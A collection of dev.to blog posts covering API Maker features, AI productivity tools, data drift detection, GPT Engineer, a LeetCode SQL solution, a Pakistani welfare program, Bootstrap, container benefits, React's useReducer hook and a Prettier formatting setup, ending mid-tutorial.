1,511,716 | 🚀 API Maker - Git Integration | 👉 Developer accounts ⭐ List of Feature ⭐ ✅ N-number of developer accounts ▸ API Maker... | 0 | 2023-10-20T04:06:52 | https://dev.to/apimaker/api-maker-git-integration-222p | javascript, webdev | ## 👉 Developer accounts
⭐ List of Feature ⭐
✅ N-number of developer accounts
▸ API Maker admin can create multiple developer account, without any limit.
▸ Enables multiple developers to collaborate on a common project with their own accounts.
▸ Each developer account has login credentials with different API paths to access APIs.
▸ API Maker allows the developers to connect with Git and pull/push their changes.
▸ Every developer has their own secrets that are not push-able in Git.
▸ Developers can be updated and deleted by API Maker admin.
▸ No duplicates are allowed for the email and api_path of developers, it must be unique.
----------------------------------
## 👉 Git integration
⭐ List of Feature ⭐
✅ Git integration
▸ To integrate with Git, the user only needs to enter the correct git credentials into the URL on the 'User Info' Page.
▸ After that user can access Git pull/push functionality from API Maker by itself.
✅ Git branch
▸ Get list of branches available on Git.
▸ Create a new branch from existing.
▸ Make branch default on just single selection.
✅ Git Pull/Push & Status
▸ User has permission to check the actual status of listed branch.
▸ Status displays the files that have a difference between your updated code and the current branch you selected.
▸ User can compare the code of each updated files.
▸ User can see the difference between them in the highlighted part.
▸ User can revert the change by just clicking the 'Revert Change' button.
▸ At the time of push the changes, user just write the commit message and click on the 'Commit' button.
▸ Make sure you have pushed your changes to your branch before clicking the 'Pull' button. This will overwrite your changes with the code from the current selected branch.
Note: Secrets and Notes are not committed on Git push operations.
----------------------------------
## 👉 Database name masking
⭐ List of Feature ⭐
✅ Masking DB for Multiple developer
▸ Masking is needed to keep the database name consistent with the production database name when multiple developers work on a single project.
✅ Manage Git push/pull
▸ Masking eliminates the need for the user to change the database name before Git push.
----------------------------------
## Youtube video link
https://youtu.be/Toq_34dC4Cw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/Git/git.html
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker |
1,511,798 | How Odin AI Helps Employees To Boost Productivity and Time Efficiency | Odin AI | In today’s fast-paced working environment, employees are constantly looking for ways to improve their... | 0 | 2023-06-21T11:02:24 | https://dev.to/getodinai/how-odin-ai-helps-employees-to-boost-productivity-and-time-efficiency-odin-ai-17hf | workplace, programming, promptengineering, ai | In today’s fast-paced working environment, employees are constantly looking for ways to improve their productivity and time efficiency. With Odin AI, an advanced conversational AI tool, achieving these goals has become easier than ever before. In this article, we will discuss the 7 ways in which Odin AI gets the job done. Coding Assistance For Developers With Odin AI
Developers spend immense amounts of time creating and testing code. Odin AI can provide programming guidance to developers and help them optimize their code. Odin AI can analyze code, detect and correct errors, and offer suggestions to improve performance.
**Prompt Example :** _“As a developer, write a simple Accordion with HTML and CSS3”_

## Summarizing Documents With Odin AI
Reading and analyzing lengthy documents can be both time-consuming and extremely challenging. With Odin AI, employees no longer have to go through the laborious task of sifting through multiple pages of text. First thing first, Odin AI offers an editable knowledge base. That means employees can upload unlimited data to Odin AI to get customized responses. Odin AI is one of those few efficient, conversational AI tools that allows users to [chat with PDF](https://blog.getodin.ai/how-to-use-odin-and-the-knowledge-base-to-summarize-a-pdf/). Upload any PDF, Web-link, or Website; Odin AI will crawl them and give desired outputs on almost everything. The best part — it reads tables and even creates tabular information.
**Prompt Example:** _“summarize this article. Here’s the [link]”_

## Create Marketing Materials With Odin AI
[Marketing](https://blog.getodin.ai/using-ai-prompts-to-enhance-your-creative-writing-with-odin/) is a critical aspect of many businesses, and creating engaging content is essential to drive sales. Odin AI can help employees create marketing materials effortlessly. By analyzing a company’s branding guidelines, core messaging, and target audience, Odin AI can suggest appropriate approaches and messaging ideas and even generate content, reducing the workload of employees.
**Prompt Example :** _“Suggest some inexpensive ways I can promote my collection of hand-painted cool t-shirts for men in New York City. The brand name is — ZAIKU”_

## Creating Fresh Content Materials With Odin AI
Generating fresh content is a challenge for many businesses. Odin AI can help employees with this task by suggesting relevant topics and keywords and even generating unique content pieces. This feature not only helps employees generate more content but also helps ensure that the content is current and relevant. Write blogs, articles, [scripts](https://blog.getodin.ai/how-to-create-awesome-social-media-video-scripts-with-odin-ai/) essays, poems, outlines, cover letters, and more.
**Prompt Example :**_“Write a how-to guide on creating a budget-friendly home gym. Keep the tone creative and engaging. Write in 200–250 words.”_

## Brainstorm Ideas With Odin AI
When it comes to generating ideas for daily chores, Odin AI is a useful resource for staff. Odin AI operates as a creative partner, encouraging original thinking and igniting new ideas with its extensive knowledge and analytical skills. It can bring significant insights, alternative ways, and [new views](https://blog.getodin.ai/finding-your-voice-a-simple-guide-to-use-odin-ais-personality-feature/) on a variety of problems.
**Prompt Example :** _“I’m stuck at a blog on “how to use Odin AI to boost time efficiency for employees”_

## Get Entertained With Odin AI
Odin AI can provide a source of entertainment for employees seeking a brief respite from their demanding tasks. It can engage in casual conversations, share jokes, offer interesting trivia, and even generate creative content like stories or poems. By offering a lighthearted diversion, Odin AI can help employees momentarily unwind and recharge, allowing them to return to their work with a refreshed mindset.
**Prompt Example:** _“Let’s play a word association game. I’ll start with a word:”_

## Drafting Emails With Odin AI
Writing clear and concise emails can be a task in itself. Odin AI can come in handy to reduce the time and effort required to compose the perfect email. It can provide templates and suggestions based on the context of the email, making it easier for employees to quickly draft professional emails.
**Prompt Example :** _“Write an email to your supervisor requesting time off for a family event next month. Be sure to include the date of the event, the reason for the request, and any necessary details about how your work will be covered during your absence.”_

## Conclusion
Odin AI can provide businesses with a cost-effective way to increase employee productivity and efficiency. The conversational AI can help employees with a variety of tasks, including content creation, research, and data management. By allowing Odin AI to handle the more repetitive and tedious tasks, employees can focus on the more important aspects of their work, leading to a more productive work environment and better results. | getodinai |
1,512,380 | AI: how to include AI in software projects | Artificial intelligence is now within everyone's reach. You don't need to be an expert in data... | 0 | 2023-06-21T20:12:37 | https://dev.to/eleonorarocchi/ai-how-to-include-ai-in-software-projects-2ep0 | ai, azure, aws, googlecloud | Artificial intelligence is now within everyone's reach. You don't need to be an expert in data analytics or machine learning to exploit its potential in software projects.
##In which areas to use AI in my software projects.
- Speech Recognition to convert audio into text and to transcribe conversations or voice commands.
- Artificial vision for image analysis and classify objects, detect faces, read images text (other than OCR!).
- Natural language analysis and understanding, automatic translation into other languages, sentiment analysis, keyword extraction.
- Improvement information search with Cognitive Search for greater efficiency and accuracy in information search.
- Creation and management of interactive knowledge bases and intelligent chatbots that can answer user questions and offer automated assistance.
##Which products can I use to include AI in my projects
- Speech Recognition: Amazon Polly, Microsoft Azure Cognitive Services, Google Cloud Speech-to-Text
- Artificial vision: Amazon Rekognition, Microsoft Azure Cognitive Services, Google Cloud Vision
- Knowledge: Amazon Lex, Microsoft Azure Cognitive Services, Google Dialogflow
- Natural language analysis: Amazon Comprehend, Amazon Translate, Microsoft Azure Cognitive Services, Google Cloud Natural Language, Google Cloud Translation
| eleonorarocchi |
1,512,416 | Data Drift: Understanding and Detecting Changes in Data Distribution | What is Data Drift? Data drift refers to the distributional change between the data used... | 0 | 2023-06-21T20:21:38 | https://dev.to/elldora/data-drift-understanding-and-detecting-changes-in-data-distribution-ne | machinelearning, datadrift, distribution, largedataset | ## What is Data Drift?
`Data drift` refers to the `distributional change` between the data used for training model and the data being send to deployed model. One of the important approaches in machine learning modeling is the **probabilistic modeling**.
> _From **Probabilistic Machine Learning** perspective, we can assume that features in a dataset, are drawn from a hypothetical distribution._
However, in real-world modeling, it becomes evident that _data does not remain constant over time_. It is influenced by various factors such as `seasonality changes`, `missing values`, `technical issues`, and `time fluctuations`. This means that a dataset collected for machine learning modeling may not be the same at all times.
**Regular monitoring of the model performance** allows us to catch instances of data drift. It is crucial to monitor the **change in data distribution** between the training data and live data from time to time.
In most cases data drift occurrence, shows that our trained model is becoming outdated, and it should be retrained or updated with the newest dataset. Here, "live data" refers to the data that is being sent to the deployed model.
## Top 5 Data Drift Techniques
Due to my need on deploy model evaluation, I had to monitor the result of the model on the unseen data. But it was a real quest to understand how to measure the model performance. It was also not clear that how could I measure the data behavior!
**[EvidentlyAI](https://www.evidentlyai.com/)** is one of websites I check regularly its articles. In [this article](https://www.evidentlyai.com/blog/data-drift-detection-large-datasets), it has introduced the `data drift` concept and `top 5 techniques` to detect it on the features used in a large dataset. It also has provided a simple example
These techniqueys are:
- **[Kolmogrorov-Smirnov (KS)](https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)** technique which is more suitable for numerical features. It is a non-parametric test score. When we use this test, we want to accept or reject that if two datasets are drawn from the same distribution or not.
- **[Population stability index (PSI)](https://mwburke.github.io/data%20science/2018/04/29/population-stability-index.html)** used to measure the data shift between two different datasets. It is suitable for both numerical and categorical dataset. The more this metric, the more different between the distribution of two datasets.
- **[Kullback-Leibler divergence(KL)](https://en.wikipedia.org/wiki/Kullback%E2%80%93Leibler_divergence)** is a metric to measure the difference between two distributions. I could be applied on numeric and categorical datasets. Its range is between 0 to infinity. The more smaller KL metric shows that two distributions are very similar.
- **[Jensen-Shannon divergence](https://en.wikipedia.org/wiki/Jensen%E2%80%93Shannon_divergence)** is defined based on the KL divergence. Its difference is that it relies between 0 to 1.
- **[Wasserstein distance](https://en.wikipedia.org/wiki/Earth_mover%27s_distance)** is a measure to monitor the numerical data drift. It is measured by the difference of the dataset means.
This article also has provided a practical example which I could apply on my own data to understand it well.
## More Resources:
As I work with Azure Machine Learning platform, I am very interested to unlock features in it.
First of all, I found a [mini course](https://learn.microsoft.com/en-us/training/modules/monitor-data-drift-with-azure-machine-learning/) about data drift which you could easily get throw and understand the main concepts in this field.
Then, I really suggest to have a look to this [article](https://towardsdatascience.com/getting-a-grip-on-data-and-model-drift-with-azure-machine-learning-ebd240176b8b) which clearly has described the data and model drift. It also tried to apply it using the Azure Machine Learning capabilities for data drift.
Finally, I found a [git repository](https://github.com/Azure/data-model-drift/tree/main) which is tried to monitory the data drift using Azure ML and integrate it with Power BI dashboard.
I am interested to know more about this topic. If you know other useful resources please put some notes about them :) | elldora |
1,512,470 | GPT Engineer: A Generative Pre-trained Transformer for Software Engineering | GPT Engineer: A Generative Pre-trained Transformer for Software Engineering GPT Engineer is a... | 0 | 2023-06-21T21:23:23 | https://dev.to/stackfoss/gpt-engineer-a-generative-pre-trained-transformer-for-software-engineering-17o | opensource, news, stackfoss, chatgpt | ---
title: GPT Engineer: A Generative Pre-trained Transformer for Software Engineering
published: true
date: 2023-06-14 14:18:09 UTC
tags: opensource, news, Stackfoss, Chatgpt
canonical_url:
---
**GPT Engineer: A Generative Pre-trained Transformer for Software Engineering**
GPT Engineer is a generative pre-trained transformer that can be used to generate code, documentation, and other software artifacts. It is trained on a massive dataset of code, natural language, and other software-related data. GPT Engineer can be used to:
- Generate code from natural language descriptions
- Generate documentation from code
- Generate test cases for code
- Generate bug fixes for code
- Generate new features for code
Generate entire software systems from scratch
GPT Engineer is still under development, but it has already been used to generate a variety of software artifacts, including:
- A web application that can be used to generate code from natural language descriptions
- A documentation generator that can generate documentation from code
- A test case generator that can generate test cases for code
- A bug fixer that can generate bug fixes for code
- A feature generator that can generate new features for code
- An entire software system from scratch
GPT Engineer is a powerful tool that can be used to automate many of the tasks involved in software development. It is still under development, but it has the potential to revolutionize the way software is developed.
**How does GPT Engineer work?**
GPT Engineer is a generative pre-trained transformer. This means that it is trained on a massive dataset of code, natural language, and other software-related data. This data is used to train the transformer model to learn the relationships between different words, phrases, and concepts.
When GPT Engineer is given a prompt, it uses its knowledge of these relationships to generate text that is relevant to the prompt. For example, if you give GPT Engineer the prompt "Write a function that takes two numbers as input and returns their sum", it will generate the following code:
```
def sum(a, b):
"""Returns the sum of two numbers."""
return a + b
```
GPT Engineer can also be used to generate other types of software artifacts, such as documentation, test cases, and bug fixes.
**How to use GPT Engineer**
GPT Engineer is available as a free open-source project on GitHub. To use GPT Engineer, you will need to install it on your computer. You can then use it to generate code, documentation, and other software artifacts.
**Benefits of using GPT Engineer**
GPT Engineer offers a number of benefits, including:
- Increased productivity: GPT Engineer can automate many of the tasks involved in software development, which can free up developers to focus on more creative and strategic work.
- Improved quality: GPT Engineer can generate code that is more consistent, readable, and maintainable than code that is written by humans.
- Reduced costs: GPT Engineer can help to reduce the cost of software development by eliminating the need to hire additional developers.
**Drawbacks of using GPT Engineer**
GPT Engineer also has some drawbacks, including:
- Limited capabilities: GPT Engineer is still under development, and it cannot currently generate all types of software artifacts.
- Potential for errors: GPT Engineer is a machine learning model, and it can make mistakes. It is important to carefully review any code or other artifacts that are generated by GPT Engineer.
---
Author:
[StackFoss](https://www.stackfoss.com) | stackfoss |
1,512,966 | Patients With a Condition | LeetCode | MSSQL | The Problem We're given a table called Patients: Column... | 20,410 | 2023-06-28T17:29:00 | https://dev.to/ranggakd/patients-with-a-condition-leetcode-mssql-4lnc | beginners, programming, leetcode, mssql | ## The Problem
We're given a table called `Patients`:
| Column Name | Type |
|--------------|---------|
| patient_id | int |
| patient_name | varchar |
| conditions | varchar |
The `patient_id` is the primary key for this table. The `conditions` field contains zero or more codes separated by spaces. The task is to write an SQL query that identifies patients who have Type I Diabetes. Type I Diabetes is always indicated with a code that starts with the prefix "DIAB1". The result should include the patient_id, patient_name, and conditions of such patients and can be returned in any order.
For instance, given the following input:
| patient_id | patient_name | conditions |
|------------|--------------|--------------|
| 1 | Daniel | YFEV COUGH |
| 2 | Alice | |
| 3 | Bob | DIAB100 MYOP |
| 4 | George | ACNE DIAB100 |
| 5 | Alain | DIAB201 |
The expected output is:
| patient_id | patient_name | conditions |
|------------|--------------|--------------|
| 3 | Bob | DIAB100 MYOP |
| 4 | George | ACNE DIAB100 |
Explanation: Bob and George both have a condition that starts with DIAB1.
## The Solution
We've derived four different solutions for this problem. All four solutions use variations of SQL's pattern matching capabilities to identify the necessary records, but each one approaches it differently, leveraging different SQL functions and strategies.
### Source Code 1
This query utilizes the `LIKE` operator to search for the substring "DIAB1" in the `conditions` column. It's checking for two scenarios: `conditions` starting with "DIAB1" or "DIAB1" appearing after a space (indicating it is the start of a new condition).
```sql
SELECT *
FROM Patients
WHERE conditions LIKE 'DIAB1%'
OR conditions LIKE '% DIAB1%'
```
This query has a runtime of 677ms, beating 20.93% of submissions.

### Source Code 2
This solution employs the `PATINDEX` function to find the starting position of the "DIAB1" substring in the `conditions` column. It checks the same scenarios as the first solution.
```sql
SELECT *
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This solution has a runtime of 799ms, beating 11.24% of submissions.

### Source Code 3
This code is identical to Source Code 2, but it specifically selects the `patient_id`, `patient_name`, and `conditions` columns to return, instead of using `SELECT *`. This can improve performance, especially if the original table has many columns.
```sql
SELECT
patient_id,
patient_name,
conditions
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This query has a runtime of 591ms, beating 35.53% of submissions.

### Source Code 4
Source Code 4 is identical to Source Code 3, so it should provide the same results. Variance in runtime is likely due to fluctuations in server load or database state rather than differences in the queries themselves.
```sql
SELECT
patient_id,
patient_name,
conditions
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This query has a runtime of 635ms, beating 26.87% of submissions.

## Conclusion
Based on the performance of these solutions in LeetCode, the most efficient solution would be Source Code 3, followed by Source Code 4, Source Code 1, and finally Source Code 2. However, keep in mind that the efficiency of SQL operations can significantly differ based on the specifics of the database, including its size, structure, indexing, and the database management system itself.
You can find the original problem at [LeetCode](https://leetcode.com/problems/patients-with-a-condition/description/).
For more insightful solutions and tech-related content, feel free to connect with me on my [Beacons page](https://beacons.ai/ranggakd).
{% embed https://beacons.ai/ranggakd %} | ranggakd |
1,513,090 | Title: Ehsaas Program: Nurturing Empathy and Social Welfare | Introduction: In a world where poverty and inequality persist as pressing challenges, the Ehsaas... | 0 | 2023-06-22T11:42:35 | https://dev.to/cnfgh547567/title-ehsaas-program-nurturing-empathy-and-social-welfare-4mgi |
Introduction:
In a world where poverty and inequality persist as pressing challenges, the Ehsaas program emerges as a beacon of hope and compassion. Developed with the aim of alleviating poverty and fostering social welfare, Ehsaas stands as a unique initiative that embraces the values of empathy, inclusivity, and human dignity. Let's dive into the intricacies of this remarkable program and explore how it is transforming lives for the better.
A Holistic Approach to Tackling Poverty:
The Ehsaas program, initiated by the Government of Pakistan, presents a holistic framework designed to address the multifaceted nature of poverty. It recognizes that poverty is not solely about lacking financial resources, but also encompasses factors such as health, education, housing, and social protection. By adopting a comprehensive approach, Ehsaas aims to create a society where no individual is left behind. [8171](bisp8171.com)
Empowering Through Social Safety Nets:
One of the fundamental pillars of the Ehsaas program is the establishment of robust social safety nets. These nets serve as a means to uplift marginalized communities and vulnerable individuals by providing them with financial assistance, healthcare, and educational opportunities. By offering cash transfers, interest-free loans, and scholarships, Ehsaas aims to empower individuals and families, enabling them to break free from the cycle of poverty and pursue a better future.
Addressing Inequality and Gender Disparities:
Ehsaas recognizes the significance of addressing inequalities that plague societies, particularly those rooted in gender disparities. The program strives to create an enabling environment where women can actively participate in the workforce, receive equal opportunities, and access resources that empower them. Through initiatives such as the [Ehsaas program](https://bisp8171.com/%D8%A7%D8%AD%D8%B3%D8%A7%D8%B3-%D9%BE%D8%B1%D9%88%DA%AF%D8%B1%D8%A7%D9%85-8171/), which provides financial assistance to widows, orphans, and deserving women, Ehsaas promotes gender equality and social justice.
Digital Solutions for Transparent Governance:
Embracing the power of technology, the Ehsaas program leverages digital solutions to ensure transparency, efficiency, and accountability. Through the Ehsaas Digital Center platform, individuals can access a range of services, including biometric verification, financial assistance applications, and information dissemination. By adopting a digital approach, Ehsaas eliminates middlemen and corrupt practices, ensuring that the benefits reach the intended beneficiaries.
Partnerships for Collective Impact:
Recognizing that tackling poverty requires collective effort, the Ehsaas program actively encourages partnerships between the government, civil society organizations, and private enterprises. By collaborating with various stakeholders, Ehsaas expands its reach, strengthens its impact, and promotes sustainable development. These partnerships foster innovative solutions, enhance service delivery, and bring about transformative change at both the individual and community levels.
Conclusion:
The Ehsaas program shines as a testament to the power of empathy and social welfare in transforming lives. By addressing poverty through a comprehensive approach, empowering individuals, bridging gender gaps, leveraging technology, and fostering partnerships, Ehsaas paves the way for a more inclusive and equitable society. It reminds us of our collective responsibility to uplift those in need, embrace compassion, and work towards a future where everyone has the opportunity to thrive. Through Ehsaas, Pakistan stands at the forefront of humanitarian efforts, inspiring the world with its dedication to creating a better tomorrow for all.
| cnfgh547567 | |
1,513,098 | 🚀 API Maker - Auto Increment | ⭐ List of Feature ⭐ ✅ Inbuilt increment ▸ Some databases, such as MongoDB, do not support... | 0 | 2023-10-25T03:24:26 | https://dev.to/apimaker/api-maker-auto-increment-c9h |
⭐ List of Feature ⭐
✅ Inbuilt increment
▸ Some databases, such as MongoDB, do not support auto-incrementing fields. API Maker can provide this functionality for those databases by automatically generating sequential values for each record.
✅ isAutoIncrementByAM
▸ To enable this feature, the user only has to set the isAutoIncrementByAM property to true.
✅ start & step
▸ The user can also specify the initial value and the increment amount for each record.
✅ CRUD operation
▸ The user can perform CRUD operations on the auto-incremented records.
✅ Easy Backup & Restore in New Environment
▸ The user can easily backup and restore the auto-increment list when creating or deleting a server.
----------------------------------
## Youtube video link
https://youtu.be/sfeOhhg3Kjw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/features/auto-increment.html#autoincrement-list
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker | |
1,513,161 | Bootstrap! | Ah so yes, I finally gained extra progress in this whole journey. I started the section of Bootstrap... | 0 | 2023-06-22T12:51:23 | https://dev.to/doyinaluko/bootstrap-1a70 | bootstrap, css, html, developer | Ah so yes, I finally gained extra progress in this whole journey. I started the section of Bootstrap properly some days back after spending so much time understanding how to use Bootstrap! I honestly can`t believe it took me close to two months to find my way into Bootstrap. I hope the developers out there will forgive me for taking so long to understand the starting point of this framework called Bootstrap. I need folks to understand what Bootstrap is because I have neutrals following this blog.
A very basic way of explaining Bootstrap without necessarily going into too much detail is to take this to the driving scene. Just imagine going to driving school and taking your lessons with a manual vehicle, and then you are gifted an automatic vehicle after mastering how to drive the manual car. This may not be the most ideal explanation for Bootstrap but it comes close. Bootstrap is essentially a framework that automates quite a lot of things you can do with CSS.
The only twist to this is the fact that when you need your page to function in a certain manner, you may have to deploy your stylesheet and style your page manually. The local stylesheet overrides the Bootstrap framework in practical applications. Bootstrap makes your work easy, but it is there to help use the local stylesheet and write codes faster.
I was overwhelmed at some point in time while working on this Bootstrap project because I was new to it at the time. I am taking out the time right now to unwind from the mental stress of setting up the page that I am going to share at the end of this post. I was able to build a responsive page using the Bootstrap. Please feel free to try out the page, and fill in the contact address on the landing page.
This is the progress so far in this tech journey. Now I can revert back to my course.
[The Bootstrap project link
](https://doyinaluko.github.io/turningnorth/) | doyinaluko |
1,513,271 | 5 Reasons Why You Should Containerize | Containerization has turned into a de facto practice of software development. But some businesses are... | 0 | 2023-06-22T14:31:31 | https://blog.dyrector.io/2023-06-21-why-containerize/ | containers, docker, kubernetes, podman | **Containerization has turned into a de facto practice of software development. But some businesses are still hesitant to jump on the hype train. Learn about the 5 reasons why organizations containerize, and how the practice improves the development of applications on any scale.**
---
## #1: Containers Are Simple for Developers
More often than not, all it takes for an engineer is a `docker compose up` to start a containerized stack. Consistency and reusability represented by **[containerization done right](https://blog.dyrector.io/2023-06-15-containerization-best-practices/)** is useful for software developers as it saves a lot of time they would need to go through manual steps without containers. A container can be sparked up on a development and a production environment with ease and the errors will be the same, which aligns with the **[shift-left](https://blog.dyrector.io/2022-02-01-left-vs-right/)** testing focus that some DevOps teams prefer.
## #2: Throwaway Containers for Experimentation
You can check your containers’ functionality out temporarily with `docker run --rm -it debian:12 /bin/bash`. Here’s how it works:
- **run:** Starts a container from any particular image. It’s relevant as OCI standards dictate that containers need to be able to run without any parameters.
- **--rm:** Deletes container after the process is exited.
- **-it:** Starts an interactive container instance in Docker. I stands for interactive, T stands for pseudo tty.
- **debian:12:** Interchangeable example image name and tag, can be any image.
- **/bin/bash:** You need a shell that can be run inside the container. For this particular use bash is sufficient.
You can use this command like a cheat code when you’re prototyping, exploring containers or creating a Dockerfile in parallel.
## #3: Effective Distribution
OCI standards provide a general solution to the problem of artifact distribution. Content addressed image layers make room for diverse usage of a container as you’re now able to store and transfer any data using images. On top of that, multiarchitecture use is now possible by adding new layers to a container which is demanded with the emergence of M1 and M2 chips as they turned the world upside down.
Image layers become handy when some elements of your containerized application change frequently, but the rest remains the same, like a frontend that gets changed on the regular compared to the backend that belongs to it.
## #4: Security
The general rule of thumb when it comes to container security is to isolate build and runtime dependencies to minimize attack surface. Another important thing to keep in mind is SBOM, which stands for “software bill of materials”. Think of it like a de facto list of ingredients that are required to make an image and with its help you can discover vulnerabilities easier. Helping companies and individuals to do risk management more efficiently, you can generate it simply with `docker sbom`, which is supported for experimental use in Docker Engine 24.0.
## #5: Minimal Performance Overhead
Ease of use comes with a mild trade-off compared to native run apps. **[Benchmark data](https://stackoverflow.com/questions/21889053/what-is-the-runtime-performance-cost-of-a-docker-container)** shows that containerized application’s performance characteristics resemble the performance of native software. Since containerization is a feature of the Linux kernel process management, it’s the ideal way to run containerized applications in Linux environments. In any other OS, Docker runs containers in a virtualized environment compared to the native manner offered by Linux.
## Time Is Money
Containerization has its limitations but it's the way that makes more sense to run successful applications as it eliminates repeatable steps of maintenance. According to Gartner’s latest research, more than 90% of global organizations will use containerized software in production by 2027 as containerization poses as an accessible multipurpose technology of data and software delivery.
### Docker vs. Podman
The obvious question at this point is whether you should go with **[Docker or Podman](https://www.imaginarycloud.com/blog/podman-vs-docker/)**. Considering the big picture, these are interchangeable, but if extra security sounds good to you in turn for a bit of extra complexity, we suggest Podman. If you want to get started with containerization, take a look at **[Awesome Docker](https://github.com/veggiemonk/awesome-docker)**.
---
_This blogpost was written by the team of [dyrector.io](https://dyrectorio.com). dyrector.io is an open-source container management platform._
**Find the project on [GitHub](https://github.com/dyrector-io/dyrectorio/).** | gerimate |
1,513,661 | A Beginner's Guide to the useReducer Hook in React.js | React.js is a popular JavaScript library for building user interfaces, and it provides several hooks... | 0 | 2023-06-22T19:14:16 | https://dev.to/gaurbprajapati/a-beginners-guide-to-the-usereducer-hook-in-reactjs-5cp6 | webdev, javascript, react, frontend |
React.js is a popular JavaScript library for building user interfaces, and it provides several hooks that simplify state management. One of the most powerful hooks is `useReducer`, which offers a predictable way to manage complex state logic within a React component. In this tutorial, we will explore the code example provided and explain each concept in detail to help beginner developers understand the `useReducer` hook.
Let's dive into the code example provided and explain each concept step by step.
1. usereducer.js:
```jsx
import { useReducer } from "react";
import React from "react";
const initialState = 0;
export default function Usereducer() {
function reducer(state, action) {
switch (action.type) {
case "increment":
return state + 1;
case "decrement":
return state - 1;
case "division":
return state / 2;
case "multiply":
return state * 2;
default:
throw new Error();
}
}
const [state, dispatch] = useReducer(reducer, initialState);
return (
<div>
Hello Count: {state}
<button onClick={() => dispatch({ type: "increment" })}>+</button>
<button onClick={() => dispatch({ type: "decrement" })}>-</button>
<button onClick={() => dispatch({ type: "division" })}> /</button>
<button onClick={() => dispatch({ type: "multiply" })}>*</button>
</div>
);
}
```
Explanation:
- Importing `useReducer` from the "react" module allows us to use the `useReducer` hook in our component.
- `initialState` represents the initial value of the state, which in this case is set to 0.
- The `Usereducer` function component is exported as the default export.
- Inside the `Usereducer` component, we define the `reducer` function. This function takes the current state and an action as parameters.
- The `switch` statement inside the reducer function checks the `action.type` to determine which case to execute. Based on the action type, the reducer returns a new state.
- The component uses the `useReducer` hook by calling it with the reducer function (`reducer`) and the initial state (`initialState`). It returns an array with two elements: the current state (`state`) and the dispatch function (`dispatch`).
- The component renders JSX that displays the current state value (`Hello Count: {state}`).
- The four buttons have `onClick` handlers that dispatch actions with different types to modify the state.
2. App.js:
```jsx
import "./styles.css";
import Usereducer from "./component/Usereducer";
export default function App() {
return (
<div className="App">
<h1>Hello CodeSandbox</h1>
<h2>Start editing to see some magic happen!</h2>
<h1>Hello sir ! </h1>
<Usereducer />
</div>
);
}
```
Explanation:
- The `App` component is the entry point of our application.
- It imports the CSS styles from "./styles.css" (which you may have defined separately) to apply to the component.
- It imports the `Usereducer` component from "./component/Usereducer" (relative path) to use it in the JSX.
- The component renders JSX that displays some headings and includes the `Usereducer` component.
3. index.js:
```jsx
import { StrictMode } from "react";
import {
createRoot } from "react-dom/client";
import App from "./App";
const rootElement = document.getElementById("root");
const root = createRoot(rootElement);
root.render(
<StrictMode>
<App />
</StrictMode>
);
```
Explanation:
- The `index.js` file is responsible for rendering our application to the DOM.
- It imports `StrictMode` from the "react" module, which helps highlight potential issues in the application during development.
- It imports `createRoot` from the "react-dom/client" module to create a root element for rendering.
- It imports the `App` component from "./App" (relative path) to use it as the main component of the application.
- The `rootElement` variable represents the DOM element where the application will be rendered (identified by the "root" id).
- `createRoot` is called with `rootElement` to create a root object for rendering.
- `root.render` is used to render the `App` component inside the `StrictMode` wrapper, ensuring that the application runs in a strict mode.
Conclusion:
In this beginner's tutorial, we examined a code example that showcases the use of the `useReducer` hook in React.js. The code example can be accessed and experimented with at this [CodeSandbox link](https://codesandbox.io/s/usereduce-hook-iocf6f).
The `useReducer` hook, along with reducers, is a powerful combination for managing state in React applications. By understanding how reducers work, developers can create predictable and maintainable state management systems. The example code demonstrated how to initialize state, define a reducer function, dispatch actions, and update the UI based on state changes.
Reducers play a vital role in the `useReducer` hook. They take the current state and an action as inputs and return a new state based on the action type. By organizing the state update logic into reducers, developers can easily understand and modify state behavior as their applications grow.
Understanding the `useReducer` hook and reducers empowers developers to build scalable and efficient React components. By following the principles outlined in this tutorial, beginners can establish a strong foundation in utilizing `useReducer` for effective state management.
Feel free to explore and experiment with the provided code example using the CodeSandbox link. Modify the code, add new actions, or incorporate additional features to further enhance your understanding of `useReducer`.
By incorporating the `useReducer` hook and understanding reducers, you'll be equipped with a powerful toolset to handle complex state logic in your React applications. Embrace the possibilities it offers and continue your journey into the world of React.js development. Happy coding!
Namaste coding! | gaurbprajapati |
1,514,703 | Automating Code Formatting with Bash and Prettier | Code formatting can be a tedious and time-consuming task, but it’s also an essential part of... | 0 | 2023-06-23T17:09:37 | https://dev.to/mazenadel19/automating-code-formatting-with-bash-and-prettier-1ddm | productivity, softwaredevelopment, programming, webdev | ---
title: Automating Code Formatting with Bash and Prettier
published: true
date: 2023-06-22 21:36:27 UTC
tags: productivity,softwaredevelopment,programming,webdevelopment
canonical_url:
---

Code formatting can be a tedious and time-consuming task, but it’s also an essential part of writing clean and maintainable code. Inconsistent formatting can make it difficult to read and understand code, and can even introduce bugs or errors.
Fortunately, there are tools available that can automate code formatting and ensure consistency across your codebase. Prettier is one such tool, and it’s become a popular choice among developers for its ease of use and flexibility.
In this tutorial, I’ll show you how to configure Prettier to automatically format your code using a pre-commit hook and a configuration file, including how to use a local configuration file to override a global configuration file.
### Step 1: Install Prettier
The first step is to install Prettier in your project. You can do this using npm or yarn:
```bash
npm install --save-dev --save-exact prettier
```
or
```bash
yarn add --dev --exact prettier
```
This installs Prettier as a development dependency in your project and ensures that you have a specific version of Prettier installed that will not change unexpectedly.
### Step 2: Create a Global Prettier Configuration File
Next, you’ll need to create a global configuration file for Prettier. This file tells Prettier how to format your code, and allows you to customize the formatting options to suit your preferences.
Create a file called .prettierrc in the root of your project, and add the following contents:
```json
{
"trailingComma": "es5",
"tabWidth": 2,
"semi": true,
"singleQuote": true
}
```
This configuration specifies that Prettier should use a comma after the last element in an array or object (using the “es5” option), use 2 spaces for indentation, add semicolons at the end of statements, and use single quotes for strings.
